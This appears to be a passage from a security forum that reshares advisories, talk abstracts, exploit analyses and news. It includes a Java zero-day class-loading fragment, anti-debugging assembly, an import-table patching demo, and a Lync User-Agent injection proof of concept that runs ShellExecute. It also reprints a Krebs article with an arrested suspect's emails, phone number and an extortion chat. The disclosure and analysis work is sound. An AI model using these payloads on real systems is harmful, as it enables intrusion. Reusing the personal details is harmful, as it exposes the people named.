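    // Toy "import table": API name -> stand-in for VirtualQuery
    // ("is this address inside a writable page?").
    static Map<String, Predicate<Long>> importTable = new HashMap<>();

    // The detector trusts whatever the import table resolves for
    // "VirtualQuery": return addresses in writable pages are rejected.
    static boolean detectorAllowsReturnTo(long addr) {
        boolean writable = importTable.get("VirtualQuery").test(addr);
        return !writable;
    }

    // Honest table entry: the (fake) stack region 0x1000-0x1FFF is writable.
    static boolean checkWithHonestTable() {
        importTable.put("VirtualQuery", a -> a >= 0x1000 && a < 0x2000);
        return detectorAllowsReturnTo(0x1234);
    }

    // "IAT patch": swap in shellcode-supplied validation that reports
    // nothing as writable, so the same stack address now passes the check.
    static boolean checkWithPatchedTable() {
        importTable.put("VirtualQuery", a -> false);
        return detectorAllowsReturnTo(0x1234);
    }

    public static void main(String[] args) {
        System.out.println(checkWithHonestTable());  // prints: false
        System.out.println(checkWithPatchedTable()); // prints: true
    }
}
```

The real attack does the same swap on the function pointers in the userland DLL's PE import table, which is writable at run time.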
  5. Security Mitigations for Return-Oriented Programming Attacks

Piotr Bania
Kryptos Logic Research
2010

Abstract

With the discovery of new exploit techniques, new protection mechanisms are needed as well. Mitigations like DEP (Data Execution Prevention) or ASLR (Address Space Layout Randomization) created a significantly more difficult environment for vulnerability exploitation. Attackers, however, have recently developed new exploitation methods which are capable of bypassing the operating system's security protection mechanisms. In this paper we present a short summary of novel and known mitigation techniques against return-oriented programming (ROP) attacks. The techniques described in this article are related mostly to x86-32 processors and Microsoft Windows operating systems.

Download: kryptoslogic.com/download/ROP_Whitepaper.pdf
  6. The Tor Software Ecosystem

Description:

THE TOR SOFTWARE ECOSYSTEM

At the very beginning, Tor was just a socks proxy that protected the origin and/or destination of your TCP flows. Now the broader Tor ecosystem includes a diverse set of projects -- browser extensions to patch Firefox and Thunderbird's privacy issues, Tor controller libraries to let you interface with the Tor client in your favorite language, network scanners to measure relay performance and look for misbehaving exit relays, LiveCDs, support for the way Android applications expect Tor to behave, full-network simulators and testing frameworks, plugins to make Tor's traffic look like Skype or other protocols, and metrics and measurement tools to keep track of how well everything's working. Many of these tools aim to be useful beyond Tor: making them modular means they're reusable for other anonymity and security projects as well.

In this talk, Roger and Jake will walk you through all the tools that make up the Tor software world, and give you a better understanding of which ones need love and how you can help.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Sursa: The Tor Software Ecosystem
  7. Static Analysis Of Java Class Files For Quickly And Accurately Detecting Web-Language Encoding Methods

Description:

Abstract

Attacks such as Cross-Site Scripting, HTTP header injection, and SQL injection take advantage of weaknesses in the way some web applications handle incoming character strings. One technique for defending against injection vulnerabilities is to sanitize untrusted strings using encoding methods. These methods convert the reserved characters in a string to an inert representation which prevents unwanted side effects. However, encoding methods which are insufficiently thorough or improperly integrated into applications can pose a significant security risk. This paper will outline an algorithm for identifying encoding methods through automated analysis of Java bytecode. The approach combines an efficient heuristic search with selective rebuilding and execution of likely candidates. This combination provides a scalable and accurate technique for identifying and profiling code that could constitute a serious weakness in an application.

*****

Speakers

Arshan Dabirsiaghi, Aspect Security
Matthew Paisner, Aspect Security
Alex Emsellem, Intern Software Engineer, Aspect Security

Alex Emsellem: Currently pursuing a bachelor's degree in Computer Science. I'm primarily focused on software reverse engineering and exploitation. Around ten years ago I found my first vulnerability in a web application, and remember it vividly. I live for innovative ideas and the cutting-edge.

Original Source: Static Analysis of Java Class Files for Quickly and Accurately Detecting Web-Language Encoding Methods on Vimeo

Sursa: Static Analysis Of Java Class Files For Quickly And Accurately Detecting Web-Language Encoding Methods
  8. Wtf - Waf Testing Framework

Description:

Abstract

We will be presenting a new approach to evaluating web application firewall capabilities that is suitable to the real world use case. Our methodology touches on issues like False Positive / False Negative rates, evasion techniques and white listing / black listing balance. We will demonstrate a tool that can be used by organizations to implement the methodology either when choosing an application protection solution or after deployment.

*****

Speakers

Yaniv Azaria, Security Research Team Leader, Imperva Inc.
Yaniv holds a B.Sc and M.Sc in Computer Science. An industry veteran with experience in developing web applications, bio-informatic algorithms and database security products. He was team leader for database security research at Imperva for 3 years and for the past couple of years has conducted general database and application security research.

Amichai Shulman, Co-Founder and CTO of Imperva, Inc.
Co-founder and CTO of Imperva Inc. with 20 years of information security experience in the military and corporate world. He leads our research group in the areas of vulnerability research as well as hacker intelligence. Holds a B.Sc and M.Sc in Computer Science.

Original Source: WTF - WAF Testing Framework - Yaniv Azaria and Amichai Shulman on Vimeo

Sursa: Wtf - Waf Testing Framework
  9. [h=1]Undocumented API use - NtSetInformationThread[/h]

Author: [h=1]drew77[/h]

; Use of the still undocumented NtSetInformationThread.
;
.386
.model flat,stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\advapi32.inc
include \masm32\include\ntdll.inc
include \masm32\macros\macros.asm

includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\ntdll.lib

.data
Failed db "Busted.",0
Sample db " ",0

.code
start:
    ; When the function is called, the thread will continue to
    ; run but a debugger will no longer receive any events
    ; related to that thread. Among the missing events are that
    ; the process has terminated, if the main thread is the
    ; hidden one. This technique is used by
    ; HyperUnpackMe2, among others.
    invoke NtSetInformationThread,-2,11h,NULL,NULL
    ; as of Saturday, January 12, 2013, STILL undocumented
    ; Details at hxxp://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Thread/NtSetInformationThread.html

    ; thread detached if debugged
    ;invoke MessageBox, 0, ADDR Failed, ADDR Sample,MB_ICONINFORMATION

    invoke ExitProcess,0
end start

Sursa: Undocumented API use - NtSetInformationThread - rohitab.com - Forums
  10. Packet Fence 3.6.1

Site: packetfence.org

PacketFence is a network access control (NAC) system. It is actively maintained and has been deployed in numerous large-scale institutions. It can be used to effectively secure networks, from small to very large heterogeneous networks. PacketFence provides NAC-oriented features such as registration of new network devices, detection of abnormal network activities including from remote snort sensors, isolation of problematic devices, remediation through a captive portal, and registration-based and scheduled vulnerability scans.

Download: http://packetstormsecurity.com/files/download/119507/packetfence-3.6.1.tar.gz

Sursa: Packet Fence 3.6.1 - Packet Storm
  11. This write up documents an analysis of the current Java zero-day floating around that affects version 7 update 10.

Hello All,

We were notified today of ongoing attacks with the use of a new Java vulnerability affecting the latest version 7 Update 10 of the software [1][2]. Due to the unpatched status of Issue 50 [3] and some inquiries received regarding whether the attack code found exploited this bug, we had a quick look at the exploit code found in the wild. Below, we are providing you with the results of our analysis.

The 0-day attack code that was spotted in the wild today is yet another instance of Java security vulnerabilities that stem from an insecure implementation of the Reflection API [4].

The new attack is a combination of two vulnerabilities. The first flaw allows loading arbitrary (restricted) classes by means of the findClass method of the com.sun.jmx.mbeanserver.MBeanInstantiator class. This can be accomplished by means of this code:

public static Class loadClass(String name) throws Throwable {
    JmxMBeanServerBuilder jmxbsb = new JmxMBeanServerBuilder();
    JmxMBeanServer jmxbs = (JmxMBeanServer) jmxbsb.newMBeanServer("", null, null);
    MBeanInstantiator mbi = jmxbs.getMBeanInstantiator();
    return mbi.findClass(name, (ClassLoader) null);
}

The problem stems from an insecure call to the Class.forName() method.

The second issue abuses the new Reflection API to successfully obtain and call MethodHandle objects that point to methods and constructors of restricted classes. This second issue relies on the invokeWithArguments method of the java.lang.invoke.MethodHandle class, which has already been the subject of a security problem (Issue 32, which we reported to Oracle on Aug 31, 2012). The company had released a fix for Issue 32 in Oct 2012. However, it turns out that the fix was not complete, as one can still abuse invokeWithArguments to set up calls to invokeExact with a trusted system class as the target method caller.
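For readers unfamiliar with the API involved: invokeWithArguments is part of the standard java.lang.invoke interface and is harmless by itself. The sketch below is a benign demonstration of the call pattern the attack abuses (resolving a method through a Lookup object and invoking it through the handle), not the exploit; the danger described above arises only when the effective caller of the handle is a trusted system class:

```java
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;

public class MhDemo {
    // Resolve Integer.parseInt(String) through the public Lookup API and
    // call it via MethodHandle.invokeWithArguments, the same trampoline
    // discussed in the analysis above.
    static int parseViaHandle(String s) {
        try {
            MethodHandle mh = MethodHandles.lookup().findStatic(
                    Integer.class, "parseInt",
                    MethodType.methodType(int.class, String.class));
            // invokeWithArguments boxes and unboxes arguments as needed.
            return (Integer) mh.invokeWithArguments(s);
        } catch (Throwable t) {
            throw new RuntimeException(t);
        }
    }

    public static void main(String[] args) {
        System.out.println(parseViaHandle("42")); // prints: 42
    }
}
```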
This time, however, the call is made to methods of the new Reflection API (from the java.lang.invoke.* package), many of which rely on security checks conducted against the caller of the target method.

Oracle's fix for Issue 32 relies on binding the MethodHandle object to the caller of a target method / constructor if it denotes a potentially dangerous Reflection API call. This binding takes the form of injecting an extra stack frame from the caller's Class Loader namespace into the call stack prior to issuing a security sensitive method call. Calls to blacklisted Reflection APIs are detected with the use of the isCallerSensitive method of the MethodHandleNatives class. The blacklisting however focuses primarily on the Core Reflection API (Class.forName(), Class.getMethods(), etc.) and does not take into account the possibility of using new Reflection API calls. As a result, the invokeWithArguments trampoline used in the context of a system (privileged) lookup object may still be abused for gaining access to restricted classes, their methods, etc.

The above is important in the context of a security check that is implemented by the Lookup class. Its checkSecurityManager method compares the Class Loader (CL) namespace of the caller class of a target find* method (findStatic, findVirtual, etc.) with the CL namespace of the class for which a given find operation is conducted. Access to restricted packages is not checked only if the Class Loader namespaces are equal (the case for the public lookup object, but also for a trusted method caller such as invokeWithArguments invoked for a method that is not blacklisted).

The exploit vector used by the attack code is the same as the one we used for the second instance of our Proof of Concept code for Issue 32 (reported to Oracle on 17-Sep-2012). This exploit vector relies on the sun.org.mozilla.javascript.internal.GeneratedClassLoader class in order to define a fully privileged attacker's class in a system Class Loader namespace.
From that point, all security checks can be easily disabled.

This is not the first time Oracle has failed to "sync" the security of the Core and new Reflection APIs. Just to mention the Reflection API filter. This is also not the first time Oracle's own investigation / analysis of security issues has turned out to be not sufficiently comprehensive. Just to mention Issue 50, which was discovered in the code addressed by the company not so long ago...

Bugs are like mushrooms, in many cases they can be found in close proximity to those already spotted. It looks like Oracle either stopped the picking too early or they are still deep in the woods...

Thank you.

Best Regards,
Adam Gowdiak

---------------------------------------------
Security Explorations
http://www.security-explorations.com
"We bring security research to the new level"
---------------------------------------------

References:
[1] Malware don't need Coffee: 0 day 1.7u10 spotted in the Wild - Disable Java Plugin NOW!
    http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html
[2] New year, new Java zeroday!
    http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/
[3] [SE-2012-01] Critical security issue affecting Java SE 5/6/7
    http://seclists.org/fulldisclosure/2012/Sep/170
[4] SE-2012-01 Details
    http://www.security-explorations.com/en/SE-2012-01-details.html

Via: Java Zero-Day Analysis - Packet Storm
  12. [h=2]Microsoft Lync Server 2010 Code Execution Vulnerability[/h]

Summary
=======
Microsoft Lync 2010 fails to properly sanitize user-supplied input, which can lead to remote code execution. Microsoft was originally notified of this issue December 11, 2012. The details of this issue were made public January 11, 2013.

CVE number: Not Assigned
Impact: Low
Vendor homepage: http://lync.microsoft.com/
Vendor notified: December 11, 2012
Vendor fixed: N/A
Credit: Christopher Emerson of White Oak Security (http://www.whiteoaksecurity.com/)

Affected Products
================
Confirmed in Microsoft Lync Server 2010, version 4.0.7577.0. Other versions may also be affected.

Details
=======
Microsoft Lync 2010, version 4.0.7577.4087, fails to sanitize the "User-Agent" header for meet.domainname.com. By inserting JavaScript into the aforementioned parameter and stacking commands, an attacker can execute arbitrary commands in the context of the application.

Impact
======
Malicious users could execute arbitrary applications on client systems, compromising the confidentiality, integrity and availability of information on the client system.

Solution
========
The vendor should implement thorough input validation in order to remove dangerous characters from user-supplied data. Additionally, the vendor should implement thorough output encoding in order to display, and not execute, dangerous characters within the browser.

Proof-of-Concept (PoC)
===================
The following request is included as a proof of concept. It is designed to open notepad.exe when the request is received by the server.
GET /christopher.emerson/JW926520 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)";var oShell = new ActiveXObject("Shell.Application");var commandtoRun = "C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-"
Host: meet.domainname.com
Connection: Keep-Alive
Cookie: LOCO=yes; icscontext=cnet; ProfileNameCookie=Christopher

Below is an abbreviated copy of the response:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-MS-Server-Fqdn: domainname.com
X-Powered-By: ASP.NET
Date: Mon, 07 May 2012 20:26:55 GMT
Connection: keep-alive
Content-Length: 23901

<!--NOTE: If DOCTYPE element is present, it causes the iFrame to be displayed in a small-->
<!--portion of the browser window instead of occupying the full browser window.-->
<html xmlns="http://www.w3.org/1999/xhtml" class="reachJoinHtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=10; IE=9; IE=8; requiresActiveX=true" />
<title>Microsoft Lync</title>
<script type="text/javascript">
var reachURL = "https://
domainname.com/Reach/Client/WebPages/ReachJoin.aspx?xml=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48Y29uZi1pbmZvIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3J0Yy8yMDA5LzA1L3NpbXBsZWpvaW5jb25mZG9jIj48Y29uZi11Y21rLXNpcDpjaHJpc3RvcGhlci5lbWVyc29uQGRvbWFpbm5hbWUuY29tO2dydXU7b3BhcXVlPWFwcDpjb25mOmZvY3VzOmlkOkpXOTI2NTIwPC9jb25mLXVyaT48c2VydmVyLXRpbWU+OTEuODAwNDwvc2VydmVyLXRpbWU+PG9yaWdpbmFsLWluY29taW5nLXVybD5odHRwczovL21lZXQuZG9tYWlubmFtZS5jb20vY2hyaXN0b3BoZXIuZW1lcnNvbi9KVzkyNjUyMDwvb3JpZ2luYWwtaW5jb21pbmctdWNtdy08Y29uZi1rZXk+Slc5MjY1MjA8L2NvbmYta2V5PjwvY29uZi1pbmZiejQh"; var escapedXML = "'\x3c\x3fxml version\x3d\x221.0\x22 encoding\x3d\x22utf-8\x22\x3f\x3e\x3cconf-info xmlns\x3axsi\x3d\x22http\x3a\x2f\x2fwww.w3.org\x2f2001\x2fXMLSchema-instance\x22 xmlns\x3axsd\x3d\x22http\x3a\x2f\x2fwww.w3.org\x2f2001\x2fXMLSchema\x22 xmlns\x3d\x22http\x3a\x2f\x2fschemas.microsoft.com\x2frtc\x2f2009\x2f05\x2fsimplejoinconfdoc\x22\x3e\x3cconf-uri\x3esip\x3achristopher.emerson\x40 domainname.com \x3bgruu\x3bopaque\x3dapp\x3aconf\x3afocus\x3aid\x3aJW926520\x3c\x2fconf-uri\x3e\x3cserver-time\x3e91.8004\x3c\x2fserver-time\x3e\x3coriginal-incoming-url\x3ehttps\x3a\x2f\ x2fmeet.domainname.com \x2fchristopher.emerson\x2fJW926520\x3c\x2foriginal-incoming-url\x3e\x3cconf-key\x3eJW926520\x3c\x2fconf-key\x3e\x3c\x2fconf-info\x3e'"; var showJoinUsingLegacyClientLink = "False"; var validMeeting = "True"; var reachClientRequested = "False"; var currentLanguage = "en-US"; var reachClientProductName = "Lync Web App"; var crackUrlRequest = "True"; var isNokia = "False"; var isAndroid = "False"; var isWinPhone = "False"; var isIPhone = "False"; var isIPad = "False"; var isMobile = "False"; var isUnsupported = "False"; var domainOwnerJoinLauncherUrl = ""; var lyncLaunchLink = "conf:sip:christopher.emerson@ domainname.com 
;gruu;opaque=app:conf:focus:id:JW926520%3Frequired-media=audio"; var errorCode = "-1"; var diagInfo = "Machine:MachineNameBrowserId:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)";var oShell = new ActiveXObject("Shell.Application");var commandtoRun = "C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-"Join attempted at:5/7/2012 3:26:55 PM"; var resourceUrl = "/meet/JavaScriptResourceHandler.ashx?lcs_se_w14_onprem4.0.7577.197&language=";

Vendor Statement
==============
The vulnerability described in this report is an XSS vulnerability in the User-Agent header which requires an attacker to be in a man-in-the-middle situation in order to be able to modify the User-Agent. In a default configuration of Lync server, TLS encryption is used to protect against this type of attack. Customers concerned about this issue should check their environments to ensure that Lync is configured to use TLS to encrypt all traffic, a default configuration.

Disclosure Timeline
==============
December 11, 2012: Disclosed to vendor (Microsoft Security Response Center).
December 18, 2012: Vendor's initial response.
December 20, 2012: Vendor deemed the issue a Low severity and confirmed the issue would be fixed in the next product release.
December 27, 2012: Received vendor approval to disclose along with Vendor Statement (see above).
January 11, 2013: Disclosed vulnerability publicly (http://whiteoaksecurity.com/blog/2013/1/11/microsoft-lync-server-2010-remote-code-executionxss-user-agent-header).

Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
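The output-encoding fix recommended in the advisory's Solution section comes down to converting HTML-significant characters in untrusted input (here, the User-Agent header) into inert entities before echoing them into a page. Below is a minimal sketch of that idea, not the vendor's implementation; note that a string echoed into a JavaScript context, as in this advisory, additionally needs context-appropriate JS string escaping:

```java
public class HtmlEncode {
    // Convert characters that are significant in HTML to entities so
    // user-controlled input is displayed rather than interpreted.
    static String encode(String s) {
        StringBuilder out = new StringBuilder();
        for (char c : s.toCharArray()) {
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // A hostile User-Agent like the one in the PoC becomes harmless text.
        String ua = "Mozilla/4.0\";var o = new ActiveXObject(\"Shell.Application\");";
        System.out.println(encode(ua));
    }
}
```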
  13. That was just irony, mister Tinkode fan. To spend five minutes finding a SQL injection in a site, you first have to choose the site, right? You chose the "Asociatia Asistentilor Medicali din Banat" (the Banat Medical Assistants' Association). All I asked you was: "WHY?". You must have a reason, no? Or was it just a dork, and these "wretches" happened to land among the first Google results? My question is simple: "What is the reason you chose this site?".
  14. Wow, what "targets"... How do you find them?
  15. Or learn C/C++ and you'll be able to program even your fridge or your microwave oven...
  16. Java is cross-platform, meaning you can build an application that runs on both Windows and Linux. The main problem is that it needs the JRE (Java Runtime) in order to run. To write Java applications you have to know the classes it provides. Another problem with Java is that it is starting to lose favor because a lot of exploits have appeared for it. Visual Basic is strictly a Microsoft brand, and I assume you mean VB.NET, since there is no reason to stay on VB6. If you want to program strictly for Windows, you can use VB.NET, but I would rather recommend C#. The .NET Framework is an extremely powerful framework that gives you many advantages for writing an application quickly, but like the JRE it is a dependency required to run the applications that use it.
  17. I don't understand why there's so much fuss about this; you'd have to be a real blockhead to click on this: Then click Run: Only for there to then be a chance it doesn't even work: The only browser that doesn't warn you that you're about to execute Java code is Opera (at least the version I have), but the "Run" window, on top of the warnings shown by the other browsers asking for the user's permission, always appears.
  18. Police Arrest Alleged ZeuS Botmaster “bx1”

A man arrested in Thailand this week on charges of stealing millions from online bank accounts fits the profile of a miscreant nicknamed “bx1,” a hacker fingered by Microsoft as a major operator of botnets powered by the ZeuS banking trojan.

As reported by The Bangkok Post, 24-year-old Hamza Bendelladj, an Algerian national, was detained this weekend at Bangkok’s Suvarnnabhumi airport, as he was in transit from Malaysia to Egypt. This young man captured news media attention when he was brought out in front of Thai television cameras handcuffed but smiling broadly, despite being blamed by the FBI for hacking into customer accounts at 217 financial institutions worldwide. Thai investigators told reporters that Bendelladj had amassed “huge amounts” in illicit earnings, and that “with just one transaction he could earn 10 to 20 million dollars. He’s been travelling the world flying first class and living a life of luxury.”

I didn’t fully appreciate why I found this case so interesting until I started searching the Internet and my own servers for his email address. Turns out that in 2011, I was contacted via instant message by a hacker who said he was operating botnets using the Zeus and SpyEye Trojans. This individual reached out to me repeatedly over the next year, for no apparent reason except to brag about his exploits. He contacted me via Microsoft’s MSN instant message platform, using the email address daniel.h.b@universityofsutton.com. That account used the alias “Daniel.” I later found out that Daniel also used the nickname bx1. According to several forums on which bx1 hung out until very recently, the man arrested in Thailand and bx1 were one and the same.

A review of the email addresses and other contact information bx1 shared on these forums suggests that bx1 was the 19th and 20th John Doe named in Microsoft’s 2012 legal suit seeking to discover the identities of 39 alleged ZeuS botmasters.
From the complaint Microsoft submitted to the U.S. District Court for the Eastern District of Virginia, and posted at Zeuslegalnotice.com:

“Plaintiffs are informed and believe and thereupon allege that John Doe 19/20 goes by the aliases “Daniel,” “bx1,” “Daniel Hamza” and “Danielbx1” and may be contacted at messaging email and messaging addresses “565359703,” airlord1988@gmail.com, bx1@hotmail.com, i_amhere@hotmail.fr, daniel.h.b@universityof sutton.com, princedelune@hotmail.fr, bx1_@msn.com, danibx1@hotmail.fr, and danieldelcore@hotmail.com. Upon information and belief, John Doe 19/20 has purchased and used the Zeus/SpyEye code.”

The Daniel I chatted with was proud of his work, and seemed to enjoy describing successful attacks. In one such conversation, dated January 2012, bx1 bragged about breaking into the systems of a hacker who used the nickname “Symlink” and was renowned in the underground for writing complex, custom Web injects for ZeuS and SpyEye users. Specifically, Symlink’s code was designed to automate money transfers out of victim banks to accounts that ZeuS and SpyEye botmasters controlled. Here’s an excerpt from that chat:

(12:31:22 AM) Daniel: if you wanna write up a story
(12:31:34 AM) Daniel: a very perfect
(12:31:34 AM) Daniel: even Interpol will get to you
(12:31:35 AM) Brian Krebs: ?
(12:31:42 AM) Daniel: i hacked the guy who fucked most banks
(12:31:48 AM) Daniel: symlink the guy who made ATS
(12:31:49 AM) Daniel: :)
(12:32:02 AM) Daniel: ATS = Auto Transfer System
(12:32:15 AM) Daniel: and get his Backups + Pictures and all his details
(12:32:37 AM) Daniel: Recent Job etc etc
(12:33:06 AM) Brian Krebs: what’s his name?
(12:33:17 AM) Daniel: full name ?
(12:34:03 AM) Brian Krebs: yeah
(12:34:10 AM) Daniel: hmmmm
(12:34:50 AM) Daniel: besliu vasile
(12:35:01 AM) Brian Krebs: what kind of name is that?
(12:35:11 AM) Brian Krebs: romanian?
(12:35:13 AM) Daniel: Moldovian name
(12:35:53 AM) Daniel: he is ugly motherufcka.
(12:36:18 AM) Daniel: after i hacked him he said that i destroyed his life (
(12:36:27 AM) Brian Krebs: aww
(12:36:55 AM) Daniel: yea because i spoke to him
(12:37:10 AM) Daniel: i said how much u pay for ur info to stay private
(12:37:19 AM) Daniel: then he said he destroyed his [hard drive]
(12:37:28 AM) Daniel: i said i dont care i got Backup
(12:37:32 AM) Daniel: it tooks me months to download all
(12:37:48 AM) Daniel: his Previous job..ats..proof video
(12:37:55 AM) Daniel: his picture with Zeus botnet showing up money
(12:38:12 AM) Daniel: his car Plate number
(12:38:17 AM) Daniel: Girls Friends
(12:38:23 AM) Daniel: his workshop. he is mechanic
(12:40:49 AM) Brian Krebs: huh. how come it took you months to [download]?
(12:41:43 AM) Daniel: i waiting for him
(12:41:46 AM) Daniel: if he don’t [pay] then i share just his personel info
(12:41:57 AM) Daniel: and videos that proof abt his jobs etc etc

It’s not clear whether bx1 had anything to do with it, but according to a lengthy thread on Mazafaka, one of the Underweb’s most exclusive cybercrime forums, Symlink was arrested late last year in Moldova.

In a post on Oct. 11, 2012, forum regulars said Symlink had been arrested the day before, and that he got caught because he flaunted his ill-gotten wealth with fancy cars (a fully loaded Land Cruiser 200, valued at more than $100,000) and ostentatious lifestyle choices that were apparently considered far beyond the means of a local auto mechanic. As they do anytime a forum member gets arrested, the forum administrators banned Symlink’s account to distance themselves from the former member.

“Economic police came to symlink yesterday. All computers were seized, one was encrypted and two not, all jabbers at the moment of seizure were online. Ban him temporarily, but better permanently. He was received adultly [meaning, arrested seriously].
Idiot overplayed.”

It’s safe to say that bx1 had his share of enemies, and it’s possible that Symlink and/or his buddies got the last laugh. According to information obtained by KrebsOnSecurity, attackers recently hacked into bx1’s computer, making off with many files, email messages, screenshots and images from his machine. Among them were scanned copies of two identity cards, both bearing the name and likeness of Hamza “Daniel” Bendelladj; one from a “University of Sutton,” and another that appears to be some kind of international ID card. It’s not clear whether these documents are legitimate or manufactured, but probably the latter: the domain attached to bx1’s MSN email address — universityofsutton.com — is registered with the following contact data:

domain: universityofsutton.com
owner: Daniel Delcore
organization: VIRUS & Malware Scanner
email: bx1_@msn.com
address: 522 8th street
city: Columbus
state: IN
postal-code: 47201
country: US
phone: +1.7573011758
admin-c: CCOM-1611324 bx1_@msn.com
tech-c: CCOM-1611324 bx1_@msn.com
billing-c: CCOM-1611324 bx1_@msn.com

Sursa: Police Arrest Alleged ZeuS Botmaster “bx1” — Krebs on Security
  19. Monitoring Strcpy With Bphook In The Immunity Debugger

Description: This is the solution to an exercise I had given in the SPSE course. I wanted the students to write a BPHook in the Immunity Debugger to monitor the arguments of the strcpy function. Due to the sparse documentation of the Immunity Debugger, this turned out to be quite a challenge for many students.

Why is this useful? API monitoring is probably the most fundamental technique when you want to observe programs at runtime and understand what they are doing. This video shows you in detail how to use the Immunity Debugger to write such a hook.

SPSE Course details and sample videos: SecurityTube Python Scripting Expert
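For readers who don't want to watch the video first, a minimal sketch of such a hook follows. It is a PyCommand meant to be run inside the Immunity Debugger itself (it will not run standalone), using the debugger's `immlib` Python API; resolving strcpy from `msvcrt` is an assumption about the target binary and may need adjusting.

```
# Sketch of an Immunity Debugger PyCommand that logs strcpy() arguments.
# Runs only inside the Immunity Debugger (32-bit Windows); not standalone.
import immlib

class StrcpyHook(immlib.BpHook):
    def __init__(self):
        immlib.BpHook.__init__(self)

    def run(self, regs):
        # Called each time the breakpoint fires. With the x86 cdecl
        # convention, the two strcpy arguments sit just above the
        # return address on the stack.
        imm = immlib.Debugger()
        dest = imm.readLong(regs['ESP'] + 4)
        src = imm.readLong(regs['ESP'] + 8)
        data = imm.readString(src)
        imm.log("strcpy(dest=0x%08x, src=0x%08x) -> %s" % (dest, src, data))

def main(args):
    imm = immlib.Debugger()
    # Assumption: the target imports strcpy from msvcrt; adjust per binary.
    addr = imm.getAddress("msvcrt.strcpy")
    if addr <= 0:
        return "could not resolve msvcrt.strcpy"
    hook = StrcpyHook()
    hook.add("strcpy_hook", addr)  # install the breakpoint hook
    return "strcpy hook installed at 0x%08x" % addr
```

Saved into the debugger's PyCommands directory, it would be invoked from the Immunity command bar, after which every strcpy call logs its arguments to the Log window.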
  20. Nosql, No Security? Description: Serving as a scalable alternative to traditional relational databases (RDBs), NoSQL databases have exploded in popularity. NoSQL databases offer more efficient ways to work with large datasets, but serious security issues need to be addressed. NoSQL databases can suffer from a variety of injection attacks. Most NoSQL databases can’t authenticate and authorize clients, and can’t provide role-based access controls or encryption. Because these controls do not exist, developers and administrators are forced to implement their own controls to compensate for these shortcomings. These compensating controls could become a problem for organizations that have compliance considerations and could make maintaining NoSQL more complex than simply deploying an enterprise relational database that features built-in security. Because many NoSQL architectures lack encryption and authentication, an attacker could eavesdrop on the client-server communication and obtain private data. Additionally, NoSQL databases can suffer from a variety of injection attacks via Javascript and JSON. Traditional SQL injection countermeasures are not effective against these attacks, so developers must be aware of these threats and write code that attackers can’t penetrate. In this presentation we’ll talk about how RDB security features and threats apply to NoSQL databases. We’ll also explore the security controls that are present in NoSQL architectures, and cover administrative, compliance and regulatory concerns associated with operating NoSQL architectures in environments that contain sensitive data. ***** Speaker: Will Urbanski, Dell Secureworks Will Urbanski, vulnerability engineer, Dell SecureWorks, guides large enterprises in initiating and administering vulnerability management programs within their corporate environments. Will also conducts penetration and vulnerability validation tests. 
An information security professional with more than seven years of industry experience, Will has been published in numerous journals, including IEEE Security & Privacy, and has co-authored a patent for an IPv6 moving target defense. Previously, Will worked in research and in security operations roles at Virginia Polytechnic Institute and the University of Georgia. He holds a B.S. in Computer Science from the University of Georgia, and is certified as a PCI Approved Scanning Vendor, a GIAC Penetration Tester and a GIAC Web Application Penetration Tester.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: NoSQL, No Security? - Will Urbanski on Vimeo

Sursa: Nosql, No Security?
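To make the injection point concrete, here is a small sketch (the login-check scenario and field names are hypothetical, not from the talk) of the MongoDB-style operator injection the description alludes to: a server that deserializes attacker-controlled JSON straight into a query document lets an operator object like `{"$ne": ""}` stand in for the expected password string, and a simple type check blocks it.

```python
import json

# Hypothetical login handler: the request body is parsed as JSON and
# dropped directly into a MongoDB-style query filter.
def build_query(payload: str) -> dict:
    data = json.loads(payload)
    return {"username": data["username"], "password": data["password"]}

def require_scalar(value):
    # Countermeasure sketch: reject non-string values so query operators
    # like $ne or $gt cannot be smuggled in through the JSON body.
    if not isinstance(value, str):
        raise ValueError("expected a scalar string value")
    return value

# Benign request.
benign = build_query('{"username": "alice", "password": "s3cret"}')

# The attacker submits an operator object instead of a password string;
# as a MongoDB filter, {"$ne": ""} matches any non-empty password.
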